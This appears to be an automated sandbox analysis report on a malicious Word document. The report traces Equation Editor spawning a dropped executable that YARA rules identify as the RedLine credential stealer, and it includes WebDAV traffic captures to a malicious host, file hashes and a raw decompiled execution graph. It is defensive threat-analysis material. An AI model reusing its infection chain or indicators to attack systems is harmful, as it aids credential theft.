                                          2024-06-24 16:23:15 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                          Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                          2024-06-24 16:23:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9192.168.2.2249175104.21.74.191443
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:17 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                          2024-06-24 16:23:17 UTC734INHTTP/1.1 405 Method Not Allowed
                                          Date: Mon, 24 Jun 2024 16:23:17 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Allow: OPTIONS,HEAD,GET,POST,TRACE
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tP2UtWyBHxHrw1Psnmeu3gkNqf3gO9QquQbRhnkcePc5I7qyYkXBnB2%2BbeC2JtWLBBzmXxHcoUMlLyqJmnBaemqh8PIR8%2BwZq9tlpX2YFsLaxl8NapCbnFKQmf%2BnYoP5%2BhCFVKb2"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0fbc5d700c82-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:23:17 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                          Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                          2024-06-24 16:23:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:12:22:52
                                          Start date:24/06/2024
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                          Imagebase:0x13f280000
                                          File size:1'423'704 bytes
                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:12:23:10
                                          Start date:24/06/2024
                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                          Imagebase:0x400000
                                          File size:543'304 bytes
                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:12:23:12
                                          Start date:24/06/2024
                                          Path:C:\Users\user\AppData\Roaming\notorious53209.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\notorious53209.exe"
                                          Imagebase:0x230000
                                          File size:644'096 bytes
                                          MD5 hash:901A623DBCCAA22525373CD36195EE14
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 50%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:12:23:13
                                          Start date:24/06/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\notorious53209.exe"
                                          Imagebase:0x1f0000
                                          File size:45'248 bytes
                                          MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:4.3%
                                            Dynamic/Decrypted Code Coverage:0.4%
                                            Signature Coverage:4.4%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:59
                                            execution_graph 97828 26ff06 97829 26ff10 97828->97829 97841 23ac90 Mailbox _memmove 97828->97841 98110 238e34 60 API calls Mailbox 97829->98110 97831 250ff6 60 API calls Mailbox 97831->97841 97836 23b5d5 98115 2381a7 97836->98115 97837 23a1b7 97839 250ff6 60 API calls Mailbox 97850 23a097 Mailbox 97839->97850 97840 2381a7 60 API calls 97840->97850 97841->97831 97841->97837 97841->97850 97851 23b685 97841->97851 97862 23b416 97841->97862 97865 270c94 97841->97865 97867 270ca2 97841->97867 97870 23b37c 97841->97870 97877 23ade2 Mailbox 97841->97877 97885 23a000 97841->97885 98019 2ac5f4 97841->98019 98051 297be0 97841->98051 98057 237f41 97841->98057 98061 2abf80 97841->98061 98101 2866f4 97841->98101 98111 287405 60 API calls 97841->98111 98112 2ac4a7 86 API calls 2 library calls 97841->98112 97843 27047f 98114 29a0b5 90 API calls 4 library calls 97843->98114 97844 23b5da 98124 29a0b5 90 API calls 4 library calls 97844->98124 97849 2377c7 60 API calls 97849->97850 97850->97836 97850->97837 97850->97839 97850->97840 97850->97843 97850->97844 97850->97849 97853 252f80 68 API calls __cinit 97850->97853 97854 287405 60 API calls 97850->97854 97857 270e00 97850->97857 97861 23a6ba 97850->97861 98104 23ca20 332 API calls 2 library calls 97850->98104 98105 23ba60 61 API calls Mailbox 97850->98105 98119 29a0b5 90 API calls 4 library calls 97851->98119 97852 27048e 97853->97850 97854->97850 97856 2866f4 Mailbox 60 API calls 97856->97837 98123 29a0b5 90 API calls 4 library calls 97857->98123 98122 29a0b5 90 API calls 4 library calls 97861->98122 98109 23f803 332 API calls 97862->98109 98120 239df0 60 API calls Mailbox 97865->98120 98121 29a0b5 90 API calls 4 library calls 97867->98121 97869 270c86 97869->97837 97869->97856 98107 239e9c 61 API calls Mailbox 97870->98107 97872 23b38d 98108 239e9c 61 API calls Mailbox 97872->98108 97877->97837 97877->97851 97877->97869 97878 2700e0 VariantClear 97877->97878 97908 235906 97877->97908 97917 2ae237 97877->97917 97920 242123 97877->97920 97960 29d2e6 97877->97960 98007 2ae24b 97877->98007 98010 2a474d 97877->98010 98106 239df0 60 API calls Mailbox 97877->98106 98113 287405 60 API calls 97877->98113 97878->97877 97886 23a01f 97885->97886 97903 23a04d Mailbox 97885->97903 98125 250ff6 97886->98125 97888 23b5d5 97889 2381a7 60 API calls 97888->97889 97902 23a1b7 97889->97902 97892 250ff6 60 API calls Mailbox 97892->97903 97893 27047f 98137 29a0b5 90 API calls 4 library calls 97893->98137 97896 2381a7 60 API calls 97896->97903 97897 2377c7 60 API calls 97897->97903 97899 287405 60 API calls 97899->97903 97900 27048e 97900->97841 97901 252f80 68 API calls __cinit 97901->97903 97902->97841 97903->97888 97903->97892 97903->97893 97903->97896 97903->97897 97903->97899 97903->97901 97903->97902 97904 270e00 97903->97904 97906 23a6ba 97903->97906 97907 23b5da 97903->97907 98135 23ca20 332 API calls 2 library calls 97903->98135 98136 23ba60 61 API calls Mailbox 97903->98136 98139 29a0b5 90 API calls 4 library calls 97904->98139 98138 29a0b5 90 API calls 4 library calls 97906->98138 98140 29a0b5 90 API calls 4 library calls 97907->98140 97909 250ff6 Mailbox 60 API calls 97908->97909 97910 235916 97909->97910 98169 235dcf 97910->98169 97915 235dcf CloseHandle 97916 235930 97915->97916 97916->97877 98178 2acdf1 97917->98178 97919 2ae247 97919->97877 98334 239bf8 97920->98334 97924 250ff6 Mailbox 60 API calls 97925 242154 97924->97925 97928 242164 97925->97928 97929 235906 61 API calls 97925->97929 97926 242189 97936 242196 97926->97936 98384 239c9c 60 API calls 97926->98384 97927 2769af 97927->97926 98383 29f7df 60 API calls 97927->98383 97930 239997 85 API calls 97928->97930 97929->97928 97931 242172 97930->97931 98367 235956 97931->98367 97934 2769f7 97934->97936 97937 2769ff 97934->97937 98347 235e3f 97936->98347 98385 239c9c 60 API calls 97937->98385 97941 24219d 97942 2421b7 97941->97942 97943 276a11 97941->97943 97945 2377c7 60 API calls 97942->97945 97944 250ff6 Mailbox 60 API calls 97943->97944 97946 276a17 97944->97946 97947 2421bf 97945->97947 97948 276a2b 97946->97948 98386 2359b0 ReadFile SetFilePointerEx 97946->98386 98352 2356d2 97947->98352 97954 276a2f _memmove 97948->97954 98387 29794e 60 API calls 2 library calls 97948->98387 97950 2421ce 97950->97954 98380 239b9c 60 API calls Mailbox 97950->98380 97955 2421e2 Mailbox 97956 24221c 97955->97956 97957 235dcf CloseHandle 97955->97957 97956->97877 97958 242210 97957->97958 97958->97956 98381 235a1a CloseHandle 97958->98381 97961 29d305 97960->97961 97962 29d310 97960->97962 98486 239c9c 60 API calls 97961->98486 97964 29d3ea Mailbox 97962->97964 97966 2377c7 60 API calls 97962->97966 97965 250ff6 Mailbox 60 API calls 97964->97965 98003 29d3f3 Mailbox 97964->98003 97967 29d433 97965->97967 97968 29d334 97966->97968 97969 29d43f 97967->97969 97971 235906 61 API calls 97967->97971 97970 2377c7 60 API calls 97968->97970 97972 239997 85 API calls 97969->97972 97973 29d33d 97970->97973 97971->97969 97974 29d457 97972->97974 97975 239997 85 API calls 97973->97975 97976 235956 68 API calls 97974->97976 97977 29d349 97975->97977 97978 29d466 97976->97978 98487 2346f9 97977->98487 97980 29d46a GetLastError 97978->97980 97981 29d49e 97978->97981 97983 29d483 97980->97983 97985 29d4c9 97981->97985 97986 29d500 97981->97986 97982 29d35e 98538 237c8e 97982->98538 97983->98003 98552 235a1a CloseHandle 97983->98552 97988 250ff6 Mailbox 60 API calls 97985->97988 97990 250ff6 Mailbox 60 API calls 97986->97990 97991 29d4ce 97988->97991 97989 29d3e3 98551 239c9c 60 API calls 97989->98551 97995 29d505 97990->97995 97996 29d4df 97991->97996 97999 2377c7 60 API calls 97991->97999 97998 2377c7 60 API calls 97995->97998 97995->98003 98553 29f835 60 API calls 2 library calls 97996->98553 97998->98003 97999->97996 98000 29d3a5 98002 237f41 60 API calls 98000->98002 98004 29d3b2 98002->98004 98003->97877 98550 293c66 64 API calls Mailbox 98004->98550 98006 29d3bb Mailbox 98006->97989 98008 2acdf1 131 API calls 98007->98008 98009 2ae25b 98008->98009 98009->97877 98011 239997 85 API calls 98010->98011 98012 2a4787 98011->98012 98569 2363a0 98012->98569 98014 2a4797 98015 2a47bc 98014->98015 98016 23a000 332 API calls 98014->98016 98017 239bf8 60 API calls 98015->98017 98018 2a47c0 98015->98018 98016->98015 98017->98018 98018->97877 98020 2377c7 60 API calls 98019->98020 98021 2ac608 98020->98021 98022 2377c7 60 API calls 98021->98022 98023 2ac610 98022->98023 98024 2377c7 60 API calls 98023->98024 98025 2ac618 98024->98025 98026 239997 85 API calls 98025->98026 98050 2ac626 98026->98050 98027 237d2c 60 API calls 98027->98050 98028 237a84 60 API calls 98028->98050 98029 2ac80f 98032 2ac83c Mailbox 98029->98032 98628 239b9c 60 API calls Mailbox 98029->98628 98031 2ac7f6 98621 237e0b 98031->98621 98032->97841 98033 2ac811 98036 237e0b 60 API calls 98033->98036 98034 2381a7 60 API calls 98034->98050 98038 2ac820 98036->98038 98041 237c8e 60 API calls 98038->98041 98039 237faf 60 API calls 98043 2ac6bd CharUpperBuffW 98039->98043 98040 237c8e 60 API calls 98040->98029 98041->98029 98042 237faf 60 API calls 98044 2ac77d CharUpperBuffW 98042->98044 98608 23859a 69 API calls 98043->98608 98609 23c707 98044->98609 98047 237e0b 60 API calls 98047->98050 98048 239997 85 API calls 98048->98050 98049 237c8e 60 API calls 98049->98050 98050->98027 98050->98028 98050->98029 98050->98031 98050->98032 98050->98033 98050->98034 98050->98039 98050->98042 98050->98047 98050->98048 98050->98049 98052 297bec 98051->98052 98053 250ff6 Mailbox 60 API calls 98052->98053 98054 297bfa 98053->98054 98055 2377c7 60 API calls 98054->98055 98056 297c08 98054->98056 98055->98056 98056->97841 98058 237f50 __NMSG_WRITE _memmove 98057->98058 98059 250ff6 Mailbox 60 API calls 98058->98059 98060 237f8e 98059->98060 98060->97841 98062 2abfab 98061->98062 98063 2abfc5 98061->98063 98636 29a0b5 90 API calls 4 library calls 98062->98636 98637 2aa528 60 API calls Mailbox 98063->98637 98066 2abfd0 98067 23a000 331 API calls 98066->98067 98068 2ac031 98067->98068 98069 2ac0c3 98068->98069 98072 2ac072 98068->98072 98094 2abfbd Mailbox 98068->98094 98070 2ac119 98069->98070 98071 2ac0c9 98069->98071 98073 239997 85 API calls 98070->98073 98070->98094 98657 297ba4 60 API calls 98071->98657 98638 297581 60 API calls Mailbox 98072->98638 98075 2ac12b 98073->98075 98078 237faf 60 API calls 98075->98078 98076 2ac0ec 98658 235ea1 60 API calls Mailbox 98076->98658 98081 2ac14f CharUpperBuffW 98078->98081 98080 2ac0a2 98639 23f5c0 98080->98639 98084 2ac169 98081->98084 98082 2ac0f4 Mailbox 98659 23fe40 332 API calls 2 library calls 98082->98659 98085 2ac1bc 98084->98085 98086 2ac170 98084->98086 98088 239997 85 API calls 98085->98088 98660 297581 60 API calls Mailbox 98086->98660 98089 2ac1c4 98088->98089 98661 239fbd 61 API calls 98089->98661 98092 2ac19e 98093 23f5c0 331 API calls 98092->98093 98093->98094 98094->97841 98095 2ac1ce 98095->98094 98096 239997 85 API calls 98095->98096 98097 2ac1e9 98096->98097 98662 235ea1 60 API calls Mailbox 98097->98662 98099 2ac1f9 98663 23fe40 332 API calls 2 library calls 98099->98663 99788 286636 98101->99788 98103 286702 98103->97841 98104->97850 98105->97850 98106->97877 98107->97872 98108->97862 98109->97851 98110->97841 98111->97841 98112->97841 98113->97877 98114->97852 98116 2381b2 98115->98116 98117 2381ba 98115->98117 99793 2380d7 60 API calls 2 library calls 98116->99793 98117->97837 98119->97869 98120->97869 98121->97869 98122->97837 98123->97844 98124->97837 98127 250ffe 98125->98127 98128 251018 98127->98128 98130 25101c std::exception::exception 98127->98130 98141 25594c 98127->98141 98158 2535e1 RtlDecodePointer 98127->98158 98128->97903 98159 2587db RaiseException 98130->98159 98132 251046 98160 258711 59 API calls _free 98132->98160 98134 251058 98134->97903 98135->97903 98136->97903 98137->97900 98138->97902 98139->97907 98140->97902 98142 2559c7 98141->98142 98145 255958 98141->98145 98167 2535e1 RtlDecodePointer 98142->98167 98144 2559cd 98168 258d68 59 API calls __getptd_noexit 98144->98168 98148 25598b RtlAllocateHeap 98145->98148 98150 255963 98145->98150 98152 2559b3 98145->98152 98156 2559b1 98145->98156 98164 2535e1 RtlDecodePointer 98145->98164 98148->98145 98149 2559bf 98148->98149 98149->98127 98150->98145 98161 25a3ab 59 API calls __NMSG_WRITE 98150->98161 98162 25a408 59 API calls 5 library calls 98150->98162 98163 2532df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98150->98163 98165 258d68 59 API calls __getptd_noexit 98152->98165 98166 258d68 59 API calls __getptd_noexit 98156->98166 98158->98127 98159->98132 98160->98134 98161->98150 98162->98150 98164->98145 98165->98156 98166->98149 98167->98144 98168->98149 98170 235921 98169->98170 98171 235de8 98169->98171 98173 2377c7 98170->98173 98171->98170 98172 235ded CloseHandle 98171->98172 98172->98170 98174 250ff6 Mailbox 60 API calls 98173->98174 98175 2377e8 98174->98175 98176 250ff6 Mailbox 60 API calls 98175->98176 98177 235929 98176->98177 98177->97915 98216 239997 98178->98216 98182 2ad0db 98247 2acc82 98182->98247 98183 2ad242 98284 2adbdc 93 API calls Mailbox 98183->98284 98184 2ace75 Mailbox 98184->97919 98187 2ad251 98187->98182 98188 2ad25d 98187->98188 98188->98184 98189 239997 85 API calls 98207 2acec6 Mailbox 98189->98207 98194 2ad114 98262 250e48 98194->98262 98197 2ad12e 98268 29a0b5 90 API calls 4 library calls 98197->98268 98198 2ad147 98269 23942e 98198->98269 98201 2ad139 GetCurrentProcess TerminateProcess 98201->98198 98202 2ad0cd 98202->98182 98202->98183 98207->98184 98207->98189 98207->98202 98266 29f835 60 API calls 2 library calls 98207->98266 98267 2ad2f3 62 API calls 2 library calls 98207->98267 98208 2ad2b8 98208->98184 98212 2ad2cc FreeLibrary 98208->98212 98209 2ad17f 98281 2ad95d 108 API calls _free 98209->98281 98212->98184 98215 2ad190 98215->98208 98282 238ea0 60 API calls Mailbox 98215->98282 98283 239e9c 61 API calls Mailbox 98215->98283 98285 2ad95d 108 API calls _free 98215->98285 98217 2399b1 98216->98217 98218 2399ab 98216->98218 98219 26f9fc __i64tow 98217->98219 98220 2399f9 98217->98220 98222 2399b7 __itow 98217->98222 98226 26f903 98217->98226 98218->98184 98234 2adab9 98218->98234 98286 2538d8 84 API calls 4 library calls 98220->98286 98224 250ff6 Mailbox 60 API calls 98222->98224 98225 2399d1 98224->98225 98225->98218 98228 237f41 60 API calls 98225->98228 98227 250ff6 Mailbox 60 API calls 98226->98227 98232 26f97b Mailbox _wcscpy 98226->98232 98229 26f948 98227->98229 98228->98218 98230 250ff6 Mailbox 60 API calls 98229->98230 98231 26f96e 98230->98231 98231->98232 98233 237f41 60 API calls 98231->98233 98287 2538d8 84 API calls 4 library calls 98232->98287 98233->98232 98288 237faf 98234->98288 98236 2adad4 CharLowerBuffW 98292 28f658 98236->98292 98240 2377c7 60 API calls 98241 2adb0d 98240->98241 98299 2379ab 98241->98299 98243 2adb24 98312 237e8c 98243->98312 98245 2adb30 Mailbox 98246 2adb6c Mailbox 98245->98246 98316 2ad2f3 62 API calls 2 library calls 98245->98316 98246->98207 98248 2acc9d 98247->98248 98252 2accf2 98247->98252 98249 250ff6 Mailbox 60 API calls 98248->98249 98250 2accbf 98249->98250 98251 250ff6 Mailbox 60 API calls 98250->98251 98250->98252 98251->98250 98253 2add64 98252->98253 98254 2adf8d Mailbox 98253->98254 98255 2add87 _strcat _wcscpy __NMSG_WRITE 98253->98255 98254->98194 98255->98254 98256 239c9c 60 API calls 98255->98256 98257 239cf8 60 API calls 98255->98257 98258 239d46 60 API calls 98255->98258 98259 239997 85 API calls 98255->98259 98260 25594c 59 API calls _W_store_winword 98255->98260 98323 295b29 62 API calls 2 library calls 98255->98323 98256->98255 98257->98255 98258->98255 98259->98255 98260->98255 98263 250e5d 98262->98263 98264 250ef5 VirtualAlloc 98263->98264 98265 250ec3 98263->98265 98264->98265 98265->98197 98265->98198 98266->98207 98267->98207 98268->98201 98270 239436 98269->98270 98271 250ff6 Mailbox 60 API calls 98270->98271 98272 239444 98271->98272 98273 239450 98272->98273 98324 23935c 60 API calls Mailbox 98272->98324 98275 2391b0 98273->98275 98325 2392c0 98275->98325 98277 250ff6 Mailbox 60 API calls 98279 23925b 98277->98279 98278 2391bf 98278->98277 98278->98279 98279->98215 98280 238ea0 60 API calls Mailbox 98279->98280 98280->98209 98281->98215 98282->98215 98283->98215 98284->98187 98285->98215 98286->98222 98287->98219 98289 237fc2 98288->98289 98291 237fbf _memmove 98288->98291 98290 250ff6 Mailbox 60 API calls 98289->98290 98290->98291 98291->98236 98293 28f683 __NMSG_WRITE 98292->98293 98294 28f6c2 98293->98294 98297 28f6b8 98293->98297 98298 28f769 98293->98298 98294->98240 98294->98245 98297->98294 98317 237a24 62 API calls 98297->98317 98298->98294 98318 237a24 62 API calls 98298->98318 98300 237a17 98299->98300 98301 2379ba 98299->98301 98302 237e8c 60 API calls 98300->98302 98301->98300 98303 2379c5 98301->98303 98308 2379e8 _memmove 98302->98308 98304 2379e0 98303->98304 98305 26ef32 98303->98305 98319 238087 60 API calls Mailbox 98304->98319 98320 238189 98305->98320 98308->98243 98309 26ef3c 98310 250ff6 Mailbox 60 API calls 98309->98310 98311 26ef5c 98310->98311 98313 237e9a 98312->98313 98315 237ea3 _memmove 98312->98315 98314 237faf 60 API calls 98313->98314 98313->98315 98314->98315 98315->98245 98316->98246 98317->98297 98318->98298 98319->98308 98321 250ff6 Mailbox 60 API calls 98320->98321 98322 238193 98321->98322 98322->98309 98323->98255 98324->98273 98326 2392c9 Mailbox 98325->98326 98327 26f5c8 98326->98327 98331 2392d3 98326->98331 98328 250ff6 Mailbox 60 API calls 98327->98328 98330 26f5d4 98328->98330 98329 2392da 98329->98278 98331->98329 98333 239df0 60 API calls Mailbox 98331->98333 98333->98331 98335 26fbff 98334->98335 98336 239c08 98334->98336 98340 26fc10 98335->98340 98388 237d2c 98335->98388 98339 250ff6 Mailbox 60 API calls 98336->98339 98342 239c1b 98339->98342 98397 237eec 98340->98397 98341 26fc1a 98344 239c34 98341->98344 98345 2377c7 60 API calls 98341->98345 98342->98341 98343 239c26 98342->98343 98343->98344 98346 237f41 60 API calls 98343->98346 98344->97924 98344->97927 98345->98344 98346->98344 98402 235c4e 98347->98402 98350 235c4e 2 API calls 98351 235e74 98350->98351 98351->97941 98353 235702 98352->98353 98354 2356dd 98352->98354 98355 237eec 60 API calls 98353->98355 98354->98353 98358 2356ec 98354->98358 98359 29349a 98355->98359 98356 2934c9 98356->97950 98414 235c18 98358->98414 98359->98356 98412 293436 ReadFile SetFilePointerEx 98359->98412 98413 237a84 60 API calls 2 library calls 98359->98413 98366 2935d8 Mailbox 98366->97950 98368 235dcf CloseHandle 98367->98368 98369 235962 98368->98369 98456 235df9 98369->98456 98371 235981 98372 2359a4 98371->98372 98464 235770 98371->98464 98372->97926 98372->97927 98382 235a1a CloseHandle 98372->98382 98374 235993 98481 2353db SetFilePointerEx SetFilePointerEx 98374->98481 98376 23599a 98376->98372 98377 26e030 98376->98377 98482 293696 SetFilePointerEx SetFilePointerEx WriteFile 98377->98482 98379 26e060 98379->98372 98380->97955 98381->97956 98382->97927 98383->97927 98384->97934 98385->97941 98386->97948 98387->97954 98389 237da5 98388->98389 98390 237d38 __NMSG_WRITE 98388->98390 98391 237e8c 60 API calls 98389->98391 98392 237d73 98390->98392 98393 237d4e 98390->98393 98396 237d56 _memmove 98391->98396 98395 238189 60 API calls 98392->98395 98401 238087 60 API calls Mailbox 98393->98401 98395->98396 98396->98340 98398 237f06 98397->98398 98400 237ef9 98397->98400 98399 250ff6 Mailbox 60 API calls 98398->98399 98399->98400 98400->98341 98401->98396 98408 235c68 98402->98408 98403 26e151 98411 235dae SetFilePointerEx 98403->98411 98404 235cef SetFilePointerEx 98410 235dae SetFilePointerEx 98404->98410 98407 235cc3 98407->98350 98408->98403 98408->98404 98408->98407 98409 26e16b 98410->98407 98411->98409 98412->98359 98413->98359 98415 250ff6 Mailbox 60 API calls 98414->98415 98416 235c2b 98415->98416 98417 250ff6 Mailbox 60 API calls 98416->98417 98418 235c37 98417->98418 98419 235632 98418->98419 98426 235a2f 98419->98426 98422 235674 98422->98366 98425 23793a 62 API calls Mailbox 98422->98425 98424 235643 98424->98422 98433 235d20 98424->98433 98439 235bda 98424->98439 98425->98366 98427 26e065 98426->98427 98428 235a40 98426->98428 98448 286443 60 API calls Mailbox 98427->98448 98428->98424 98430 26e06f 98431 250ff6 Mailbox 60 API calls 98430->98431 98432 26e07b 98431->98432 98434 235d93 98433->98434 98435 235d2e 98433->98435 98449 235dae SetFilePointerEx 98434->98449 98436 235d56 98435->98436 98438 235d66 ReadFile 98435->98438 98436->98424 98438->98435 98438->98436 98440 26e117 98439->98440 98441 235bee 98439->98441 98455 286443 60 API calls Mailbox 98440->98455 98450 235b19 98441->98450 98444 235bfa 98444->98424 98445 26e122 98446 250ff6 Mailbox 60 API calls 98445->98446 98447 26e137 _memmove 98446->98447 98448->98430 98449->98435 98451 235b31 98450->98451 98453 235b2a _memmove 98450->98453 98452 250ff6 Mailbox 60 API calls 98451->98452 98454 26e0a7 98451->98454 98452->98453 98453->98444 98454->98454 98455->98445 98457 235e12 CreateFileW 98456->98457 98458 26e181 98456->98458 98460 235e34 98457->98460 98459 26e187 CreateFileW 98458->98459 98458->98460 98459->98460 98461 26e1ad 98459->98461 98460->98371 98462 235c4e 2 API calls 98461->98462 98463 26e1b8 98462->98463 98463->98460 98465 26dfce 98464->98465 98466 23578b 98464->98466 98470 235e3f 2 API calls 98465->98470 98480 23581a 98465->98480 98467 235c4e 2 API calls 98466->98467 98466->98480 98468 2357ad 98467->98468 98483 23538e 98468->98483 98470->98480 98472 2357c4 98473 250ff6 Mailbox 60 API calls 98472->98473 98474 2357cf 98473->98474 98475 23538e 60 API calls 98474->98475 98476 2357da 98475->98476 98477 235d20 2 API calls 98476->98477 98478 235807 98477->98478 98479 235c4e 2 API calls 98478->98479 98479->98480 98480->98374 98481->98376 98482->98379 98484 250ff6 Mailbox 60 API calls 98483->98484 98485 2353a0 98484->98485 98485->98465 98485->98472 98486->97962 98488 2377c7 60 API calls 98487->98488 98489 23470f 98488->98489 98490 2377c7 60 API calls 98489->98490 98491 234717 98490->98491 98492 2377c7 60 